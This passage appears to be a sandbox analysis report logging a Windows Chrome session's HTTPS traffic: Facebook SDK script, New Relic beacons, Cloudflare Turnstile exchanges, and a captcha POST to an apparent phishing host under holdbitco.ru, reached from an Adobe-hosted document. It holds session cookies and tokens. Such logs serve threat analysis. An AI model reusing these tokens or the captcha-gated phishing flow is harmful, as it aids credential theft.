                                                                                                                                                                                                                                                                                                              x-fb-content-md5: 71515572fa5e78428f5568d43dab629b
                                                                                                                                                                                                                                                                                                              ETag: "4978981293888257416d22940ad75220"
                                                                                                                                                                                                                                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              timing-allow-origin: *
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                              content-md5: cVFVcvpeeEKPVWjUPatimw==
                                                                                                                                                                                                                                                                                                              Expires: Wed, 25 Oct 2023 16:41:17 GMT
                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=1200,stale-while-revalidate=3600
                                                                                                                                                                                                                                                                                                              document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                              permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
                                                                                                                                                                                                                                                                                                              cross-origin-opener-policy: same-origin-allow-popups
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              reporting-endpoints:
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              origin-agent-cluster: ?0
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
                                                                                                                                                                                                                                                                                                              X-FB-Debug: 273DXBRNUbwWDNbkU0iDye+AE7aLSdf9AZ1KCZ2WrrUF/yWQDMlkBsLW6uSag72l6X6mQwCvJrZnBTcde9zTRw==
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:18 GMT
                                                                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Content-Length: 3093
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC214INData Raw: 2f
                                                                                                                                                                                                                                                                                                              Data Ascii: /
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC214INData Raw: 2a 31 36 39 38 32 35 30 38 37 37 2c 2c 4a 49 54 20 43 6f 6e 73 74 72 75 63 74 69 6f 6e 3a 20 76 31 30 30 39 34 37 30 33 31 36 2c 65 6e 5f 55 53 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 0a 20 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 20 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20
                                                                                                                                                                                                                                                                                                              Data Ascii: *1698250877,,JIT Construction: v1009470316,en_US*//** * Copyright (c) 2017-present, Facebook, Inc. All rights reserved. * * You are hereby granted a non-exclusive, worldwide, royalty-free license to use, * copy, modify, and distribute this software
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:18 UTC215INData Raw: 5b 31 5d 29 7d 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 74 68 69 73 2e 63 61 6c 6c 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 62 28 64 29 3b 74 68 69 73 2e 63 61 6c 6c 73 3d 5b 5d 7d 2c 63 61 6c 6c 73 3a 5b 5d 2c 6f 70 74 73 3a 6e 75 6c 6c 7d 2c 67 65 74 55 73 65 72 49 44 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 22 7d 2c 67 65 74 41 75 74 68 52 65 73 70 6f 6e 73 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 2c 67 65 74 41 63 63 65 73 73 54 6f 6b 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 2c 69 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 67 2e 5f 5f 62 75 66 66 65 72 2e 6f 70 74 73 3d 61 7d 7d 3b 66 6f 72 28 62 3d 30 3b 62 3c 64 2e 6c 65 6e 67 74 68 3b 62 2b 2b 29 7b 66 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: [1])};for(var d=0;d<this.calls.length;d++)b(d);this.calls=[]},calls:[],opts:null},getUserID:function(){return""},getAuthResponse:function(){return null},getAccessToken:function(){return null},init:function(a){g.__buffer.opts=a}};for(b=0;b<d.length;b++){f=


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              110162.247.243.30443192.168.2.1649830C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:25 UTC1517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Content-Length: 24
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:28:25 GMT
                                                                                                                                                                                                                                                                                                              content-type: image/gif
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                              x-served-by: cache-iad-kiad7000126-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:25 UTC1517INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a,


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              111192.168.2.1649832162.247.243.30443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:35 UTC1517OUTGET /events/1/a3d3f0e0e6?a=7895775&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=78813&ck=1&ref=https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: bam-cell.nr-data.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: JSESSIONID=4950c9090a569fe0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              112162.247.243.30443192.168.2.1649832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:35 UTC1518INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Content-Length: 24
                                                                                                                                                                                                                                                                                                              date: Wed, 25 Oct 2023 16:28:35 GMT
                                                                                                                                                                                                                                                                                                              content-type: image/gif
                                                                                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                                                                                              access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                              x-served-by: cache-iad-kjyo7100172-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:35 UTC1518INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02
                                                                                                                                                                                                                                                                                                              Data Ascii: GIF89a,


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              113192.168.2.1649833104.17.2.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1518OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 28650
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              CF-Challenge: c7b054a34972c39
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1519OUTData Raw: 76 5f 38 31 62 62 64 34 30 65 31 65 63 61 35 39 66 31 3d 79 67 45 47 54 64 4c 6d 30 4a 67 55 67 64 57 64 64 4c 77 42 45 64 24 4c 70 4a 72 4a 55 58 57 37 4c 53 4a 35 47 4c 37 4c 44 55 4a 7a 78 55 67 58 4a 7a 57 4a 4e 63 33 45 32 46 4a 4d 39 4a 66 78 55 37 4a 59 30 43 4a 4a 61 4a 25 32 62 6e 4c 76 4a 6a 67 4c 35 79 35 4c 32 64 4a 76 47 68 65 4c 54 4a 4c 43 58 68 4a 55 47 4c 46 66 4a 55 30 4c 79 34 75 47 32 44 4e 44 35 74 6e 74 4a 4d 47 57 48 4a 57 47 57 6d 4a 6d 5a 63 47 4f 38 4a 61 76 55 71 63 4a 6b 37 4a 55 78 4a 2b 6e 58 4c 2b 39 75 6e 56 4a 64 39 59 64 2b 45 78 74 6a 24 67 53 59 67 45 78 79 32 47 67 58 57 6f 51 6a 6e 52 57 66 5a 4f 4d 4a 35 4a 73 54 46 4a 4e 58 4a 59 4d 30 57 56 6b 42 6e 50 47 44 2b 54 48 73 42 56 6e 6f 33 69 43 5a 59 50 73 47 64 68 36
                                                                                                                                                                                                                                                                                                              Data Ascii: v_81bbd40e1eca59f1=ygEGTdLm0JgUgdWddLwBEd$LpJrJUXW7LSJ5GL7LDUJzxUgXJzWJNc3E2FJM9JfxU7JY0CJJaJ%2bnLvJjgL5y5L2dJvGheLTJLCXhJUGLFfJU0Ly4uG2DND5tntJMGWHJWGWmJmZcGO8JavUqcJk7JUxJ+nXL+9unVJd9Yd+Extj$gSYgExy2GgXWoQjnRWfZOMJ5JsTFJNXJYM0WVkBnPGD+THsBVno3iCZYPsGdh6
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1535OUTData Raw: 2d 64 47 4a 6d 57 4a 47 31 59 6f 4a 6b 6f 58 79 4a 61 2d 39 2d 65 4a 79 43 55 47 64 45 4a 44 4a 6a 47 4a 6a 4a 24 24 32 46 4c 57 4a 72 4a 6b 70 64 51 56 48 47 38 58 64 39 58 61 4a 55 78 64 50 4a 56 24 6a 45 32 68 4a 6d 47 6a 47 32 42 4a 44 47 35 30 4c 58 4a 70 57 4d 4a 4c 4d 4a 53 47 4c 6e 4a 72 47 79 47 6a 69 2b 6c 50 2b 47 32 39 33 4e 58 45 4a 6b 30 4c 65 4a 4e 47 4c 30 4a 24 6e 2b 51 53 78 4c 65 4a 7a 57 45 70 36 65 58 5a 6c 77 4a 4c 4b 4c 6e 48 4d 24 4a 30 4a 7a 47 4a 34 47 67 4a 6a 47 6b 78 4a 34 47 73 2d 73 45 4a 4a 4c 74 4a 38 45 4a 59 4b 55 4a 55 47 64 63 37 77 55 57 30 4a 74 4a 77 55 6a 74 4a 64 4a 37 4a 68 78 4c 78 4c 75 47 64 4a 32 50 4a 4d 4b 57 47 4d 74 4a 58 47 51 47 6b 44 4a 6b 67 4a 6e 4a 47 4a 35 47 4d 6e 64 51 4a 6f 47 57 78 64 4f 4a 53
                                                                                                                                                                                                                                                                                                              Data Ascii: -dGJmWJG1YoJkoXyJa-9-eJyCUGdEJDJjGJjJ$$2FLWJrJkpdQVHG8Xd9XaJUxdPJV$jE2hJmGjG2BJDG50LXJpWMJLMJSGLnJrGyGji+lP+G293NXEJk0LeJNGL0J$n+QSxLeJzWEp6eXZlwJLKLnHM$J0JzGJ4GgJjGkxJ4Gs-sEJJLtJ8EJYKUJUGdc7wUW0JtJwUjtJdJ7JhxLxLuGdJ2PJMKWGMtJXGQGkDJkgJnJGJ5GMndQJoGWxdOJS


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              114104.17.2.184443192.168.2.1649833C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1547INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:28:41 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              cf-chl-out: UlGAZiAqm45LKbzxRMoOiLVpFJe5ZNZpObV3faDoF6m2rchNtbd0Dm/1JwvI/mJ/7FKshNQ+PDNZF2TRbbnUOnNrhC5mrjXndvXGKmkGLt+EOdqh++EjNPZfFxGd/Vq+$prNh5V312LHd3utmOl8Jww==
                                                                                                                                                                                                                                                                                                              cf-chl-out-s: 1T/giCNwisUw7IcDHRXOk1vZb12qj69c/bZcNYYflU6XIday+lOqP3GzVPNNXhmZ9pT2ybZmvA/2A+3W/+IagRHugqwHtl+JsLoaaPFqLtCE5d/qBKi1SQvF60cnjFVKpO0VIi0E/e792/Yxarkuh2WTfej91sV95e5VNHNCZuwC3Y/DBOMWHxLHjxgDpUciqRhzIYWI6lgGVUdm+sZcqktSv3jxzQ7CNkq0FObaLSNlpBIvkxUdWji1GjrP9mUJE/ycm48om+j6GmUYTo/Ip6dxDC8sYRV53yCHrrBaPXb4se6k604or0helYHImiBXkRDNH9GcgoCRSTi0I1WLji5TbM7kyBkbEKw6oeyEbjpETrgSLn2Q5PCXfXjBqY60pRrQ/1y094oogdQxm7mMlG054xCEi5QrtOqJu6YU0zfwBm14LoSOf72/8pArIvFClpTyxQakqedr5ITXjV/g+eJVNmgaS3mHuv0Fnk7GlkrxNGi7LrJE368U/P75SajD6bJtnbxhpaxyZmjEc2eVwIRLBjMgXaFcOCs4QzgHmiLctKbJwLFC0S9E/J2b2WMLJ8jgjsA2NhTI8ELdXRkSULM3JypThI1zJxQeBMHKYJf6EsRZ4mFnCccGA350oQ1BMSF72DTPQ4iBU3Y/VQkU/sL8X1kfcxgMfzBVZEfpjpUkvuBP+8UGnJzQoSNQ99lhhtE4jhwzb4IbG3WTmnB8T08d4EML/sQtTk88OijY9O0P+4VeOSsCxPPVPzjrzVKuf7ncA85w8HGr5ex1OYPVeXgz7BGNRac8yoWD5wUsyIA=$4AiTxvkG+LZ2PFAaRd21XQ==
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd5853958082d-IAD
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1548INData Raw: 64 37 30 0d 0a 6f 49 57 46 6e 4a 75 57 74 6f 57 4d 7a 4d 37 46 6b 61 75 74 73 63 75 33 7a 37 4b 6f 31 71 79 34 33 4b 44 4b 79 2b 4b 2b 76 4d 61 39 32 37 4c 49 34 4d 79 2f 78 65 50 43 33 4d 44 54 74 4e 2b 7a 30 38 58 74 39 4f 33 4e 30 2f 6a 78 30 66 58 74 2f 4e 55 47 7a 2f 62 6d 34 4f 6a 68 41 4e 62 75 2f 75 45 4b 37 77 66 6c 2f 65 4d 55 45 50 59 4d 30 2f 63 56 39 76 76 62 41
                                                                                                                                                                                                                                                                                                              Data Ascii: d70oIWFnJuWtoWMzM7Fkautscu3z7Ko1qy43KDKy+K+vMa927LI4My/xePC3MDTtN+z08Xt9O3N0/jx0fXt/NUGz/bm4OjhANbu/uEK7wfl/eMUEPYM0/cV9vvbA
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1548INData Raw: 41 30 59 39 51 34 51 43 4f 67 43 35 77 6a 35 46 76 59 6c 41 52 50 6f 4a 67 59 58 4b 4f 34 36 4d 52 4d 61 4d 77 67 64 4c 79 6b 67 4b 7a 6b 38 4c 6a 45 33 50 79 63 38 41 7a 35 46 4a 79 30 78 49 42 31 48 53 77 68 43 53 79 55 76 54 42 4d 6f 56 54 63 2b 51 54 42 4e 55 6a 56 45 47 56 74 66 4e 44 4e 65 5a 45 68 4e 61 46 6f 74 4c 53 31 75 63 58 4a 75 64 6b 55 79 4f 6a 74 54 52 33 56 58 4f 6e 70 73 62 6b 46 42 51 59 4b 46 68 59 43 4b 57 55 68 63 57 56 47 43 5a 6f 4e 2f 68 6d 4a 30 55 70 70 32 61 70 52 63 69 46 75 50 6e 5a 4a 31 62 71 65 56 69 4a 39 64 6c 32 6d 6c 65 58 71 66 70 32 2b 4b 62 49 4f 74 6f 61 57 47 72 70 4a 35 6e 36 69 66 6c 6e 32 66 6b 5a 69 43 66 35 61 6f 68 49 57 61 78 70 79 37 68 38 37 53 76 4a 4b 75 7a 64 58 44 77 70 50 51 30 72 36 6f 75 39 6d 61
                                                                                                                                                                                                                                                                                                              Data Ascii: A0Y9Q4QCOgC5wj5FvYlARPoJgYXKO46MRMaMwgdLykgKzk8LjE3Pyc8Az5FJy0xIB1HSwhCSyUvTBMoVTc+QTBNUjVEGVtfNDNeZEhNaFotLS1ucXJudkUyOjtTR3VXOnpsbkFBQYKFhYCKWUhcWVGCZoN/hmJ0Upp2apRciFuPnZJ1bqeViJ9dl2mleXqfp2+KbIOtoaWGrpJ5n6ifln2fkZiCf5aohIWaxpy7h87SvJKuzdXDwpPQ0r6ou9ma
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1550INData Raw: 44 37 46 79 41 6b 43 4f 41 6b 41 75 4d 66 44 69 30 45 4a 44 49 77 4f 69 30 77 45 43 6f 64 50 52 51 62 2b 42 77 59 4e 67 4d 6e 4f 79 41 48 52 44 5a 4e 4f 45 52 44 4d 46 41 75 54 6b 4a 49 54 69 59 58 56 55 34 76 4b 46 6c 53 57 43 77 6a 57 30 34 76 4f 55 46 4b 52 44 6c 62 4f 6d 6b 36 59 69 68 4c 50 45 35 52 62 6c 4a 50 4d 45 4e 45 62 6b 35 6d 56 6c 6c 79 4e 47 46 32 50 48 31 54 59 47 57 42 58 58 35 45 58 6b 56 6e 53 47 42 78 62 58 47 4b 62 6e 4b 51 62 6c 46 7a 57 46 42 32 65 4a 68 30 65 70 5a 32 65 33 47 43 6d 33 5a 68 68 59 6c 38 6a 49 71 4e 67 33 75 4f 70 33 2b 46 6b 61 75 43 63 61 36 76 68 34 32 79 73 35 65 55 66 34 37 42 76 34 57 2f 77 62 6e 42 71 4d 6e 4b 78 4d 36 64 30 4a 53 50 7a 38 32 55 32 4d 66 47 6a 70 50 65 33 74 57 71 7a 36 44 59 6c 36 48 58 30
                                                                                                                                                                                                                                                                                                              Data Ascii: D7FyAkCOAkAuMfDi0EJDIwOi0wECodPRQb+BwYNgMnOyAHRDZNOERDMFAuTkJITiYXVU4vKFlSWCwjW04vOUFKRDlbOmk6YihLPE5RblJPMENEbk5mVllyNGF2PH1TYGWBXX5EXkVnSGBxbXGKbnKQblFzWFB2eJh0epZ2e3GCm3ZhhYl8jIqNg3uOp3+FkauCca6vh42ys5eUf47Bv4W/wbnBqMnKxM6d0JSPz82U2MfGjpPe3tWqz6DYl6HX0
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1551INData Raw: 67 4b 68 37 70 4d 53 34 4d 37 53 34 76 4a 68 6f 32 44 6a 49 61 47 53 6f 2b 4e 54 6b 33 50 68 6c 43 48 44 34 6a 51 45 56 47 42 6b 41 73 42 45 52 44 45 45 6f 68 55 31 45 37 4c 44 56 46 53 6c 41 34 4e 43 6f 5a 57 45 5a 41 5a 31 35 68 4d 7a 4e 6a 5a 45 42 69 62 57 67 72 58 6d 74 75 59 6a 64 72 4e 6b 78 31 63 48 4e 79 52 32 35 71 64 57 39 36 55 57 42 45 65 47 56 63 5a 59 47 45 68 6d 75 4e 69 49 4b 41 69 59 65 4f 68 6f 31 58 62 49 57 54 62 6f 35 5a 6b 35 71 69 57 70 46 63 63 47 4b 6b 68 6d 5a 32 71 4a 57 69 62 6f 35 74 71 59 43 74 62 4b 35 78 72 6e 61 44 70 37 57 4f 69 4b 32 35 6b 70 53 62 77 61 32 6b 78 61 4b 37 71 4b 65 37 77 36 65 34 71 49 32 6e 6e 36 79 78 79 61 6e 4b 32 70 71 6a 74 4c 36 6f 76 64 47 59 77 70 6e 58 33 4c 75 35 77 62 57 33 76 63 62 6b 77 37
                                                                                                                                                                                                                                                                                                              Data Ascii: gKh7pMS4M7S4vJho2DjIaGSo+NTk3PhlCHD4jQEVGBkAsBERDEEohU1E7LDVFSlA4NCoZWEZAZ15hMzNjZEBibWgrXmtuYjdrNkx1cHNyR25qdW96UWBEeGVcZYGEhmuNiIKAiYeOho1XbIWTbo5Zk5qiWpFccGKkhmZ2qJWibo5tqYCtbK5xrnaDp7WOiK25kpSbwa2kxaK7qKe7w6e4qI2nn6yxyanK2pqjtL6ovdGYwpnX3Lu5wbW3vcbkw7
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1551INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              115192.168.2.1649835104.17.2.184443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1551OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              116192.168.2.1649834104.21.0.95443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1552OUTPOST /web5/validatecaptcha HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              Content-Length: 562
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                                                                                                                                                                              X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Origin: https://yxmaiypmfuyt.holdbitco.ru
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmc
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1553OUTData Raw: 63 61 70 74 63 68 61 3d 30 2e 76 33 31 39 41 6f 54 41 51 6f 47 64 66 39 5f 59 79 5f 36 65 75 45 62 4d 77 58 70 76 4d 6b 64 33 31 58 74 36 75 72 56 6e 53 64 61 72 62 4f 72 49 70 57 31 76 35 63 6a 66 64 65 48 73 6e 55 5f 57 58 44 31 50 64 38 71 62 52 4a 32 49 37 67 53 71 52 72 4f 35 5f 45 68 7a 45 75 6e 49 6d 6c 49 30 4e 35 71 79 53 56 68 48 4c 6d 6f 49 4e 56 6e 64 77 44 4e 54 66 46 5f 74 64 57 59 7a 34 51 47 33 43 75 35 6a 75 4a 63 6d 37 48 77 69 73 70 30 33 54 30 54 64 44 44 64 55 74 46 33 4d 7a 62 43 58 65 30 53 2d 78 76 79 50 30 6c 2d 67 6d 66 78 41 6d 4e 63 6c 75 41 71 37 73 4a 6d 75 72 53 6c 5a 45 35 43 44 5f 5a 4d 57 58 59 64 76 44 4d 53 51 6b 4e 64 30 68 78 6b 45 41 56 63 57 6f 65 41 62 5a 49 63 52 30 77 58 32 39 38 33 4d 78 4d 42 6a 54 49 53 4f 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: captcha=0.v319AoTAQoGdf9_Yy_6euEbMwXpvMkd31Xt6urVnSdarbOrIpW1v5cjfdeHsnU_WXD1Pd8qbRJ2I7gSqRrO5_EhzEunImlI0N5qySVhHLmoINVndwDNTfF_tdWYz4QG3Cu5juJcm7Hwisp03T0TdDDdUtF3MzbCXe0S-xvyP0l-gmfxAmNcluAq7sJmurSlZE5CD_ZMWXYdvDMSQkNd0hxkEAVcWoeAbZIcR0wX2983MxMBjTISOo


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              117104.17.2.184443192.168.2.1649835C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:28:41 UTC1553INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:28:41 GMT
